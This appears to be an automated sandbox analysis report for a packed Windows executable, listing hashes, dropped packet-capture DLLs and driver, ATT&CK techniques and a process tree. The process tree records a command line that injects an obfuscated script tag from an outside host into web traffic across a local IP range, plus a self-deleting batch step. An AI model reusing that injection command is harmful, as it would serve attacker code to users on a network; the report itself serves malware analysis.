b539e88e0a242560c75b36e6072ab8aa920d28d0023203063746b4f4beda4a95

Analysis

max time kernel
109s
max time network
90s
platform
windows7_x64
resource
win7-20221111-en
resource tags

arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
submitted
01-12-2022 15:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b539e88e0a242560c75b36e6072ab8aa920d28d0023203063746b4f4beda4a95.exe
Size

177KB
MD5

26636f9002c7d612535c3398d5e7d048
SHA1

5c777355eaddaa730bd0b3fc1667334c9601a452
SHA256

b539e88e0a242560c75b36e6072ab8aa920d28d0023203063746b4f4beda4a95
SHA512

99ccec9829c4efcfc01200e573e4dfd12dbbf7f95d61201037deb13eff08efa79d24fbda6023302686a01f89c8838887fa2a02cb591c47b47b5ddb065cf30235
SSDEEP

3072:Zj0e1p7ySwdHbHlYFnCwth+BszVZH/w0S0BySkDbQKl3lWhV4PsjNgMthcF9out:MdJdKVZH/w0Ls3Xq74Psj+QcF9oS

Score

8^/10

upx

Malware Config

Signatures

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\drivers\npf.sys	b539e88e0a242560c75b36e6072ab8aa920d28d0023203063746b4f4beda4a95.exe

Executes dropped EXE 1 IoCs

pid	Process
1156	360ubxs.exe

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1228-54-0x0000000000400000-0x0000000000485000-memory.dmp	upx
behavioral1/memory/1228-56-0x0000000000400000-0x0000000000485000-memory.dmp	upx
behavioral1/memory/1228-90-0x0000000000400000-0x0000000000485000-memory.dmp	upx

Deletes itself 1 IoCs

pid	Process
972	cmd.exe

Loads dropped DLL 8 IoCs

pid	Process
1228	b539e88e0a242560c75b36e6072ab8aa920d28d0023203063746b4f4beda4a95.exe
1228	b539e88e0a242560c75b36e6072ab8aa920d28d0023203063746b4f4beda4a95.exe
1156	360ubxs.exe
1156	360ubxs.exe
1156	360ubxs.exe
1156	360ubxs.exe
1156	360ubxs.exe
1156	360ubxs.exe

Drops file in System32 directory 5 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\npptools.dll	b539e88e0a242560c75b36e6072ab8aa920d28d0023203063746b4f4beda4a95.exe
File created	C:\Windows\SysWOW64\Packet.dll	b539e88e0a242560c75b36e6072ab8aa920d28d0023203063746b4f4beda4a95.exe
File created	C:\Windows\SysWOW64\WanPacket.dll	b539e88e0a242560c75b36e6072ab8aa920d28d0023203063746b4f4beda4a95.exe
File created	C:\Windows\SysWOW64\wpcap.dll	b539e88e0a242560c75b36e6072ab8aa920d28d0023203063746b4f4beda4a95.exe
File created	C:\Windows\SysWOW64\360ubxs.exe	b539e88e0a242560c75b36e6072ab8aa920d28d0023203063746b4f4beda4a95.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1932	PING.EXE

Suspicious behavior: LoadsDriver 13 IoCs

pid	Process
464	Process not Found
464	Process not Found
464	Process not Found
464	Process not Found
464	Process not Found
464	Process not Found
464	Process not Found
464	Process not Found
464	Process not Found
464	Process not Found
464	Process not Found
464	Process not Found
464	Process not Found

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 1228 wrote to memory of 1156	1228	b539e88e0a242560c75b36e6072ab8aa920d28d0023203063746b4f4beda4a95.exe	28
PID 1228 wrote to memory of 1156	1228	b539e88e0a242560c75b36e6072ab8aa920d28d0023203063746b4f4beda4a95.exe	28
PID 1228 wrote to memory of 1156	1228	b539e88e0a242560c75b36e6072ab8aa920d28d0023203063746b4f4beda4a95.exe	28
PID 1228 wrote to memory of 1156	1228	b539e88e0a242560c75b36e6072ab8aa920d28d0023203063746b4f4beda4a95.exe	28
PID 1228 wrote to memory of 972	1228	b539e88e0a242560c75b36e6072ab8aa920d28d0023203063746b4f4beda4a95.exe	30
PID 1228 wrote to memory of 972	1228	b539e88e0a242560c75b36e6072ab8aa920d28d0023203063746b4f4beda4a95.exe	30
PID 1228 wrote to memory of 972	1228	b539e88e0a242560c75b36e6072ab8aa920d28d0023203063746b4f4beda4a95.exe	30
PID 1228 wrote to memory of 972	1228	b539e88e0a242560c75b36e6072ab8aa920d28d0023203063746b4f4beda4a95.exe	30
PID 972 wrote to memory of 1932	972	cmd.exe	32
PID 972 wrote to memory of 1932	972	cmd.exe	32
PID 972 wrote to memory of 1932	972	cmd.exe	32
PID 972 wrote to memory of 1932	972	cmd.exe	32

C:\Users\Admin\AppData\Local\Temp\b539e88e0a242560c75b36e6072ab8aa920d28d0023203063746b4f4beda4a95.exe
"C:\Users\Admin\AppData\Local\Temp\b539e88e0a242560c75b36e6072ab8aa920d28d0023203063746b4f4beda4a95.exe"
1⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:1228
- C:\Windows\SysWOW64\360ubxs.exe
  -idx 0 -ip 10.127.0.2-10.127.0.254 -port 80 -insert "<script language=JavaScript src=http://f%65a.P%61ss%69ngG%61s.n%65t/tj.js></script>"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:1156
- C:\Windows\SysWOW64\cmd.exe
  cmd /c 12.bat
  2⤵
  - Deletes itself
  - Suspicious use of WriteProcessMemory
  PID:972
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1 -n 5
    3⤵
    - Runs ping.exe
    PID:1932

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\12.bat

Filesize
2KB

MD5
6528954884c7c155e6457f6714bd1090

SHA1
562124c02739377ab021f353fcc778afeb68f204

SHA256
8593ba8e14eb7f3ac3ca8bf692202e13b91c5c7ffcb515a105ed2a13c1b990fa

SHA512
ed8ba982bccfb86b1986de00dbf93e76e9e4b6082d769ca5676617c6252897a4199da83ae29c404de30da63969de03d712c90485a28c26264bdbc87dd875b4c4

Download Submit
C:\Windows\SysWOW64\360ubxs.exe

Filesize
8.0MB

MD5
1fb5bacc181e0a179d63b32b28a97ca6

SHA1
f74277dd83f2057f806ccb58f4479415c1a7990d

SHA256
4ba77d76b0db6e4f23ed67bd9338d651e726c08ba56b4d398bf9fb2c236e4ced

SHA512
69db9d0f0514d970b24b02497cc71241a77fa147d1c5ba027e11e461156775af56cf06578dd0ae6d778e539d8e039b25ba9724fbd616ae03eeaaa4cb9959f894

Download Submit
C:\Windows\SysWOW64\NPPTools.dll

Filesize
53KB

MD5
841007a04750a9acb56dd82095300d15

SHA1
58c1e338bc78a54795a844b559b614004e53d3cb

SHA256
a15c409af481494fa8c3d82ec0dc7c67075a706160cc060bec982e40c060d578

SHA512
dcaeae21ffc2479fc595632a93e082396caea1eb6c4093e24c199a5ee3dd09248dfb5fe11ea200034e2be928b2db09218d9d763428294347ccd63f4cad4c06de

Download Submit
C:\Windows\SysWOW64\WPCAP.DLL

Filesize
234KB

MD5
ce842d25e5b7e6ff21a86cad9195fbe8

SHA1
d762270be089a89266b012351b52c595e260b59b

SHA256
7e8c0119f352424c61d6fad519394924b7aedbf8bfb3557d53c2961747d4c7f3

SHA512
84c23addda6ff006d4a3967b472af10a049b2a045d27d988d22153fc3ba517e21520a31eb061a2ef2abf302e365564dd4601d240ec3d5894fb96f10a9fae97d6

Download Submit
C:\Windows\SysWOW64\WanPacket.dll

Filesize
66KB

MD5
fdd104a9fd3427a1df37041fa947a041

SHA1
cca1881a3c02033008f78cc39b712b637c7f3e13

SHA256
384e928f13bc1c25ca16b3247d7ca942aec6834fadb05b1487f2c975678d4a9a

SHA512
9dd082eb245b443cc75b37c69f0a17e15fcb9cdb676b058d87f9805ec7a928e721a681b940fcdd56fd81da4d308f0d514870c526c4f9c715b256a97ab6bb29f7

Download Submit
C:\Windows\SysWOW64\drivers\NPF.sys

Filesize
41KB

MD5
b15e0180c43d8b5219196d76878cc2dd

SHA1
33e676b37a3380de32c10ba5bc9170997445d314

SHA256
a4a102aab8f91a5b452ae2c9a40f5ebc07bc62af892af57d6e3ad1f4340486ab

SHA512
47e0e66e89ad11506aff709e7cd5817f5b68bafd5fbc4cc4f4ba5b82b1845977023c90273c58d580266fc8fdcb7fd230ade9c31a8dcc8b9b6ca146423e848a09

Download Submit
C:\Windows\SysWOW64\packet.dll

Filesize
86KB

MD5
9062aeea8cbfc4f0780bbbefad7cebcb

SHA1
c4ad39ec51ad0e84fe58f62931d13cddfde3189e

SHA256
b2535129b26366484c487cc2ce536d8fcfa9d1ac1dab0db9560b4532012c352c

SHA512
60957548fc2272998aea518acf3b1812ed77f73e960a99ddf0d6b474b0858225286c26554bf81c00acf3cb1c77c5ce458d80e149ed4766287d7e32af9681e646

Download Submit
\Windows\SysWOW64\360ubxs.exe

Filesize
8.0MB

MD5
1fb5bacc181e0a179d63b32b28a97ca6

SHA1
f74277dd83f2057f806ccb58f4479415c1a7990d

SHA256
4ba77d76b0db6e4f23ed67bd9338d651e726c08ba56b4d398bf9fb2c236e4ced

SHA512
69db9d0f0514d970b24b02497cc71241a77fa147d1c5ba027e11e461156775af56cf06578dd0ae6d778e539d8e039b25ba9724fbd616ae03eeaaa4cb9959f894

Download Submit
\Windows\SysWOW64\360ubxs.exe

Filesize
8.0MB

MD5
1fb5bacc181e0a179d63b32b28a97ca6

SHA1
f74277dd83f2057f806ccb58f4479415c1a7990d

SHA256
4ba77d76b0db6e4f23ed67bd9338d651e726c08ba56b4d398bf9fb2c236e4ced

SHA512
69db9d0f0514d970b24b02497cc71241a77fa147d1c5ba027e11e461156775af56cf06578dd0ae6d778e539d8e039b25ba9724fbd616ae03eeaaa4cb9959f894

Download Submit
\Windows\SysWOW64\Packet.dll

Filesize
86KB

MD5
9062aeea8cbfc4f0780bbbefad7cebcb

SHA1
c4ad39ec51ad0e84fe58f62931d13cddfde3189e

SHA256
b2535129b26366484c487cc2ce536d8fcfa9d1ac1dab0db9560b4532012c352c

SHA512
60957548fc2272998aea518acf3b1812ed77f73e960a99ddf0d6b474b0858225286c26554bf81c00acf3cb1c77c5ce458d80e149ed4766287d7e32af9681e646

Download Submit
\Windows\SysWOW64\WanPacket.dll

Filesize
66KB

MD5
fdd104a9fd3427a1df37041fa947a041

SHA1
cca1881a3c02033008f78cc39b712b637c7f3e13

SHA256
384e928f13bc1c25ca16b3247d7ca942aec6834fadb05b1487f2c975678d4a9a

SHA512
9dd082eb245b443cc75b37c69f0a17e15fcb9cdb676b058d87f9805ec7a928e721a681b940fcdd56fd81da4d308f0d514870c526c4f9c715b256a97ab6bb29f7

Download Submit
\Windows\SysWOW64\drivers\npf.sys

Filesize
41KB

MD5
b15e0180c43d8b5219196d76878cc2dd

SHA1
33e676b37a3380de32c10ba5bc9170997445d314

SHA256
a4a102aab8f91a5b452ae2c9a40f5ebc07bc62af892af57d6e3ad1f4340486ab

SHA512
47e0e66e89ad11506aff709e7cd5817f5b68bafd5fbc4cc4f4ba5b82b1845977023c90273c58d580266fc8fdcb7fd230ade9c31a8dcc8b9b6ca146423e848a09

Download Submit
\Windows\SysWOW64\drivers\npf.sys

Filesize
41KB

MD5
b15e0180c43d8b5219196d76878cc2dd

SHA1
33e676b37a3380de32c10ba5bc9170997445d314

SHA256
a4a102aab8f91a5b452ae2c9a40f5ebc07bc62af892af57d6e3ad1f4340486ab

SHA512
47e0e66e89ad11506aff709e7cd5817f5b68bafd5fbc4cc4f4ba5b82b1845977023c90273c58d580266fc8fdcb7fd230ade9c31a8dcc8b9b6ca146423e848a09

Download Submit
\Windows\SysWOW64\npptools.dll

Filesize
53KB

MD5
841007a04750a9acb56dd82095300d15

SHA1
58c1e338bc78a54795a844b559b614004e53d3cb

SHA256
a15c409af481494fa8c3d82ec0dc7c67075a706160cc060bec982e40c060d578

SHA512
dcaeae21ffc2479fc595632a93e082396caea1eb6c4093e24c199a5ee3dd09248dfb5fe11ea200034e2be928b2db09218d9d763428294347ccd63f4cad4c06de

Download Submit
\Windows\SysWOW64\wpcap.dll

Filesize
234KB

MD5
ce842d25e5b7e6ff21a86cad9195fbe8

SHA1
d762270be089a89266b012351b52c595e260b59b

SHA256
7e8c0119f352424c61d6fad519394924b7aedbf8bfb3557d53c2961747d4c7f3

SHA512
84c23addda6ff006d4a3967b472af10a049b2a045d27d988d22153fc3ba517e21520a31eb061a2ef2abf302e365564dd4601d240ec3d5894fb96f10a9fae97d6

Download Submit
memory/972-89-0x0000000000000000-mapping.dmp

Download
memory/1156-83-0x0000000000290000-0x0000000000299000-memory.dmp

Filesize
36KB

Download
memory/1156-88-0x0000000000290000-0x0000000000299000-memory.dmp

Filesize
36KB

Download
memory/1156-93-0x0000000000400000-0x000000000040F000-memory.dmp

Filesize
60KB

Download
memory/1156-73-0x0000000000030000-0x0000000000040000-memory.dmp

Filesize
64KB

Download
memory/1156-64-0x0000000000000000-mapping.dmp

Download
memory/1156-70-0x00000000001B0000-0x00000000001C5000-memory.dmp

Filesize
84KB

Download
memory/1156-78-0x0000000000400000-0x000000000040F000-memory.dmp

Filesize
60KB

Download
memory/1156-87-0x0000000000290000-0x0000000000299000-memory.dmp

Filesize
36KB

Download
memory/1156-86-0x0000000000400000-0x000000000040F000-memory.dmp

Filesize
60KB

Download
memory/1156-82-0x0000000000290000-0x0000000000299000-memory.dmp

Filesize
36KB

Download
memory/1228-57-0x0000000074DC1000-0x0000000074DC3000-memory.dmp

Filesize
8KB

Download
memory/1228-54-0x0000000000400000-0x0000000000485000-memory.dmp

Filesize
532KB

Download
memory/1228-84-0x0000000000240000-0x000000000024F000-memory.dmp

Filesize
60KB

Download
memory/1228-85-0x0000000000240000-0x000000000024F000-memory.dmp

Filesize
60KB

Download
memory/1228-58-0x0000000074E11000-0x0000000074E13000-memory.dmp

Filesize
8KB

Download
memory/1228-59-0x0000000074BF1000-0x0000000074BF3000-memory.dmp

Filesize
8KB

Download
memory/1228-77-0x0000000000240000-0x000000000024F000-memory.dmp

Filesize
60KB

Download
memory/1228-56-0x0000000000400000-0x0000000000485000-memory.dmp

Filesize
532KB

Download
memory/1228-90-0x0000000000400000-0x0000000000485000-memory.dmp

Filesize
532KB

Download
memory/1228-55-0x0000000075C41000-0x0000000075C43000-memory.dmp

Filesize
8KB

Download
memory/1228-76-0x0000000000240000-0x000000000024F000-memory.dmp

Filesize
60KB

Download
memory/1932-92-0x0000000000000000-mapping.dmp

Download